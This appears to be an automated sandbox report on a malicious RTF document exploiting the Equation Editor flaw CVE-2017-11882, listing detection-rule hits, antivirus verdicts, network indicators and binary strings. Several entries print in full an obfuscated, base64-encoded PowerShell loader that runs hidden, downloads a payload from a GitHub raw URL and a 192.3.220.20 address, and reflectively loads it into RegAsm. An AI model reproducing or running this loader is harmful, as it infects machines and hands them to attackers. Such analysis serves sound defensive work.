'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5Jys
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\Window
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3344, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , ProcessId: 3500, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3344, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , ProcessId: 3500, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\Window
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3344, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" , ProcessId: 3500, ProcessName: wscript.exe
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\Window
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5Jys
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3548, TargetFilename: C:\Users\user\AppData\Local\Temp\lm1hfh3i.ubr.ps1
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: IpEmBW3Qw5.rtfAvira: detected
Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
Source: http://192.3.220.20Virustotal: Detection: 7%Perma Link
Source: http://192.3.220.20/100/RRFGV.txtVirustotal: Detection: 11%Perma Link
Source: IpEmBW3Qw5.rtfReversingLabs: Detection: 50%
Source: IpEmBW3Qw5.rtfVirustotal: Detection: 63%Perma Link

Exploits

barindex
Source: Static RTF information: Object: 0 Offset: 000063D9h
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.220.20 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
Source: ~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmp.0.drStream path '_1789623330/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmp.0.drStream path '_1789623369/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.385123337.0000000004430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
